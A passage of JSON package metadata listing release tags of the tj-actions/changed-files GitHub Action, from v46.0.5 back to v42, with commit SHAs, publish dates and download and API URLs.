ags/v46.0.5/manifests"},{"name":"v46","sha":"ed68ef82c095e0d48ec87eccea555d944a631a4c","kind":"commit","published_at":"2025-04-09T03:16:25.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v46","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v46","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v46","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v46","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v46/manifests"},{"name":"v46.0.4","sha":"6cb76d07bee4c9772c6882c06c37837bf82a04d3","kind":"commit","published_at":"2025-04-03T16:44:43.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v46.0.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v46.0.4","dependencies_parsed_at":null,"dependency_job_id":"04a95772-1b5a-47f8-8251-9353f016bd9c","purl":"pkg:github/tj-actions/changed-files@v46.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v46.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v46.0.4/manifests"},{"name":"v46.0.3","sha":"823fcebdb31bb35fdf2229d9f769b400309430d0","kind":"commit","published_at":"2025-03-23T10:27:35.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v46.0.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v46.0.3","dependencies_parsed_at":null,"dependency_job_id":"9e39978f-6509-4dc7-99fb-beec475f7b83","purl":"pkg:github/tj-actions/changed-files@v46.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v46.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v46.0.3/manifests"},{"name":"v46.0.2","sha":"26a38635fc1173cc5820336ce97be6188d0de9f5","kind":"commit","published_at":"2025-03-22T20:14:28.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v46.0.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v46.0.2","dependencies_parsed_at":null,"dependency_job_id":"f3cebbdd-5b7f-4b21-b6f3-9a6a38b0af04","purl":"pkg:github/tj-actions/changed-files@v46.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v46.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v46.0.2/manifests"},{"name":"v46.0.1","sha":"2f7c5bfce28377bc069a65ba478de0a74aa0ca32","kind":"commit","published_at":"2025-03-16T04:10:55.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v46.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v46.0.1","dependencies_parsed_at":"2025-03-17T04:05:53.218Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v46.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v46.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v46.0.1/manifests"},{"name":"v46.0.0","sha":"4cd184a1dd542b79cca1d4d7938e4154a6520ca7","kind":"commit","published_at":"2025-03-16T03:36:55.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v46.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v46.0.0","dependencies_parsed_at":"2025-03-17T04:05:53.223Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v46.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v46.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v46.0.0/manifests"},{"name":"v45.0.9","sha":"a284dc1814e3fd07f2e34267fc8f81227ed29fb8","kind":"commit","published_at":"2025-03-15T17:54:46.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v45.0.9","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v45.0.9","dependencies_parsed_at":"2025-03-17T04:05:53.223Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v45.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.9/manifests"},{"name":"v45.0.8","sha":"a284dc1814e3fd07f2e34267fc8f81227ed29fb8","kind":"commit","published_at":"2025-03-15T17:54:46.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v45.0.8","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v45.0.8","dependencies_parsed_at":"2025-03-17T04:05:53.225Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v45.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.8/manifests"},{"name":"v45.0.7","sha":"a284dc1814e3fd07f2e34267fc8f81227ed29fb8","kind":"commit","published_at":"2025-03-15T17:54:46.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v45.0.7","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v45.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v45.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.7/manifests"},{"name":"v45.0.6","sha":"a284dc1814e3fd07f2e34267fc8f81227ed29fb8","kind":"commit","published_at":"2025-03-15T17:54:46.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v45.0.6","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v45.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v45.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.6/manifests"},{"name":"v45.0.5","sha":"a284dc1814e3fd07f2e34267fc8f81227ed29fb8","kind":"commit","published_at":"2025-03-15T17:54:46.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v45.0.5","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v45.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v45.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.5/manifests"},{"name":"v45.0.4","sha":"4edd678ac3f81e2dc578756871e4d00c19191daf","kind":"commit","published_at":"2024-11-05T20:16:30.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v45.0.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v45.0.4","dependencies_parsed_at":"2024-11-11T07:48:46.673Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v45.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.4/manifests"},{"name":"v45.0.3","sha":"c3a1bb2c992d77180ae65be6ae6c166cf40f857c","kind":"commit","published_at":"2024-10-03T12:48:13.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v45.0.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v45.0.3","dependencies_parsed_at":"2024-10-05T11:16:04.519Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v45.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.3/manifests"},{"name":"v45.0.2","sha":"48d8f15b2aaa3d255ca5af3eba4870f807ce6b3c","kind":"commit","published_at":"2024-09-16T12:06:47.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v45.0.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v45.0.2","dependencies_parsed_at":"2024-09-21T10:26:28.155Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v45.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.2/manifests"},{"name":"v45","sha":"48d8f15b2aaa3d255ca5af3eba4870f807ce6b3c","kind":"commit","published_at":"2024-09-16T12:06:47.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v45","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v45","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v45","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45/manifests"},{"name":"v45.0.1","sha":"e9772d140489982e0e3704fea5ee93d536f1e275","kind":"commit","published_at":"2024-09-01T13:13:15.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v45.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v45.0.1","dependencies_parsed_at":"2024-09-03T07:51:02.240Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v45.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.1/manifests"},{"name":"v45.0.0","sha":"40853de9f8ce2d6cfdc73c1b96f14e22ba44aec4","kind":"commit","published_at":"2024-08-21T10:07:25.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v45.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v45.0.0","dependencies_parsed_at":"2024-09-01T07:18:40.886Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v45.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v45.0.0/manifests"},{"name":"v44.5.7","sha":"c65cd883420fd2eb864698a825fc4162dd94482c","kind":"commit","published_at":"2024-07-30T00:55:58.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v44.5.7","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v44.5.7","dependencies_parsed_at":"2024-08-01T12:40:32.933Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v44.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.5.7/manifests"},{"name":"v44.5.6","sha":"6b2903bdce6310cfbddd87c418f253cf29b2dec9","kind":"commit","published_at":"2024-07-18T19:39:13.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v44.5.6","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v44.5.6","dependencies_parsed_at":"2024-08-01T12:40:32.932Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v44.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.5.6/manifests"},{"name":"v44.5.5","sha":"cc733854b1f224978ef800d29e4709d5ee2883e4","kind":"commit","published_at":"2024-06-24T16:06:44.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v44.5.5","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v44.5.5","dependencies_parsed_at":"2024-06-26T11:23:16.212Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v44.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.5.5/manifests"},{"name":"v44.5.4","sha":"cc3bbb0c526f8ee1d282f8c5f9f4e50745a5b457","kind":"commit","published_at":"2024-06-23T07:03:16.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v44.5.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v44.5.4","dependencies_parsed_at":"2024-06-25T13:37:23.276Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v44.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.5.4/manifests"},{"name":"v44.5.3","sha":"eaf854ef0c266753e1abec356dcf17d92695b251","kind":"commit","published_at":"2024-06-19T18:37:27.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v44.5.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v44.5.3","dependencies_parsed_at":"2024-06-25T13:37:23.319Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v44.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.5.3/manifests"},{"name":"v44.5.2","sha":"d6babd6899969df1a11d14c368283ea4436bca78","kind":"commit","published_at":"2024-05-30T05:05:34.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v44.5.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v44.5.2","dependencies_parsed_at":"2024-05-31T11:38:46.916Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v44.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.5.2/manifests"},{"name":"v44.5.1","sha":"03334d095e2739fa9ac4034ec16f66d5d01e9eba","kind":"commit","published_at":"2024-05-24T04:46:34.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v44.5.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v44.5.1","dependencies_parsed_at":"2024-10-30T04:32:28.691Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v44.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.5.1/manifests"},{"name":"v44.5.0","sha":"1754cd4b9e661d1f0eced3b33545a8d8b3bc46d8","kind":"commit","published_at":"2024-05-21T04:21:52.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v44.5.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v44.5.0","dependencies_parsed_at":null,"dependency_job_id":"b0ed46ca-ffe3-4e7b-9312-194b96fc1c04","purl":"pkg:github/tj-actions/changed-files@v44.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.5.0/manifests"},{"name":"v44.4.0","sha":"a29e8b565651ce417abb5db7164b4a2ad8b6155c","kind":"commit","published_at":"2024-05-08T13:08:12.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v44.4.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v44.4.0","dependencies_parsed_at":"2024-05-14T05:03:06.722Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v44.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.4.0/manifests"},{"name":"v44.3.0","sha":"0874344d6ebbaa00a27da73276ae7162fadcaf69","kind":"commit","published_at":"2024-04-18T21:03:38.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v44.3.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v44.3.0","dependencies_parsed_at":"2024-04-21T17:22:58.071Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v44.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.3.0/manifests"},{"name":"v44.2.0","sha":"4c5f5d698fbf2d763d5f13815ac7c2ccbef1ff7f","kind":"commit","published_at":"2024-04-18T18:52:38.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v44.2.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v44.2.0","dependencies_parsed_at":"2024-04-21T17:22:55.252Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v44.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.2.0/manifests"},{"name":"v44.1.0","sha":"e052d30e1c0bdf27cd806b01ca3b393f47b50c62","kind":"commit","published_at":"2024-04-17T16:24:26.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v44.1.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v44.1.0","dependencies_parsed_at":"2024-04-19T14:12:25.206Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v44.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.1.0/manifests"},{"name":"v44.0.1","sha":"635f118699dd888d737c15018cd30aff2e0274f8","kind":"commit","published_at":"2024-04-09T22:45:21.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v44.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v44.0.1","dependencies_parsed_at":"2024-04-13T19:05:31.056Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v44.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.0.1/manifests"},{"name":"v44.0.0","sha":"2d756ea4c53f7f6b397767d8723b3a10a9f35bf2","kind":"commit","published_at":"2024-03-27T01:52:24.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v44.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v44.0.0","dependencies_parsed_at":"2024-03-29T13:40:44.127Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v44.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44.0.0/manifests"},{"name":"v44","sha":"2d756ea4c53f7f6b397767d8723b3a10a9f35bf2","kind":"commit","published_at":"2024-03-27T01:52:24.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v44","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v44","dependencies_parsed_at":"2024-03-29T13:40:44.140Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v44","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v44/manifests"},{"name":"v43.0.1","sha":"20576b4b9ed46d41e2d45a2256e5e2316dde6834","kind":"commit","published_at":"2024-03-20T21:58:07.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v43.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v43.0.1","dependencies_parsed_at":"2024-03-22T11:24:53.468Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v43.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v43.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v43.0.1/manifests"},{"name":"v43.0.0","sha":"77af4bed286740ef1a6387dc4e4e4dec39f96054","kind":"commit","published_at":"2024-03-13T22:28:45.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v43.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v43.0.0","dependencies_parsed_at":"2024-03-17T13:43:54.744Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v43.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v43.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v43.0.0/manifests"},{"name":"v43","sha":"77af4bed286740ef1a6387dc4e4e4dec39f96054","kind":"commit","published_at":"2024-03-13T22:28:45.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v43","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v43","dependencies_parsed_at":"2024-03-17T13:43:49.024Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v43","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v43","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v43/manifests"},{"name":"v42.1.0","sha":"aa08304bd477b800d468db44fe10f6c61f7f7b11","kind":"commit","published_at":"2024-03-09T01:29:44.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v42.1.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v42.1.0","dependencies_parsed_at":"2024-03-15T15:28:55.689Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v42.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42.1.0/manifests"},{"name":"v42.0.7","sha":"7fc073d92265804a8d4e4982b637dee053daf6c5","kind":"commit","published_at":"2024-03-07T22:11:09.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v42.0.7","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v42.0.7","dependencies_parsed_at":"2024-03-15T15:28:55.759Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v42.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42.0.7/manifests"},{"name":"v42.0.6","sha":"d516645658aa4705b46600cdbf9e6d54f56b973f","kind":"commit","published_at":"2024-03-06T12:50:33.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v42.0.6","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v42.0.6","dependencies_parsed_at":"2024-03-13T11:59:20.038Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v42.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42.0.6/manifests"},{"name":"v42.0.5","sha":"800a2825992141ddde1a8bca8ad394cec34d3188","kind":"commit","published_at":"2024-02-26T02:02:02.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v42.0.5","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v42.0.5","dependencies_parsed_at":"2024-02-27T12:12:25.996Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v42.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42.0.5/manifests"},{"name":"v42.0.4","sha":"3f54ebb830831fc121d3263c1857cfbdc310cdb9","kind":"commit","published_at":"2024-02-18T03:20:58.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v42.0.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v42.0.4","dependencies_parsed_at":"2024-02-22T09:20:31.387Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v42.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42.0.4/manifests"},{"name":"v42.0.3","sha":"ec75ae5ab7296b81fd4cddb77294d6718932ebab","kind":"commit","published_at":"2024-02-17T22:32:19.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v42.0.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v42.0.3","dependencies_parsed_at":"2024-02-22T09:20:31.403Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v42.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42.0.3/manifests"},{"name":"v42.0.2","sha":"90a06d6ba9543371ab4df8eeca0be07ca6054959","kind":"commit","published_at":"2024-01-25T18:46:48.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v42.0.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v42.0.2","dependencies_parsed_at":"2024-01-28T06:41:50.828Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v42.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42.0.2/manifests"},{"name":"v42.0.1","sha":"ac21d93904fb48e7f76ce4bd2a4d197f67e34abe","kind":"commit","published_at":"2024-01-24T08:44:11.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v42.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v42.0.1","dependencies_parsed_at":"2024-01-28T06:41:50.829Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v42.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42.0.1/manifests"},{"name":"v42","sha":"ac21d93904fb48e7f76ce4bd2a4d197f67e34abe","kind":"commit","published_at":"2024-01-24T08:44:11.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v42","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v42","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v42","tag_url"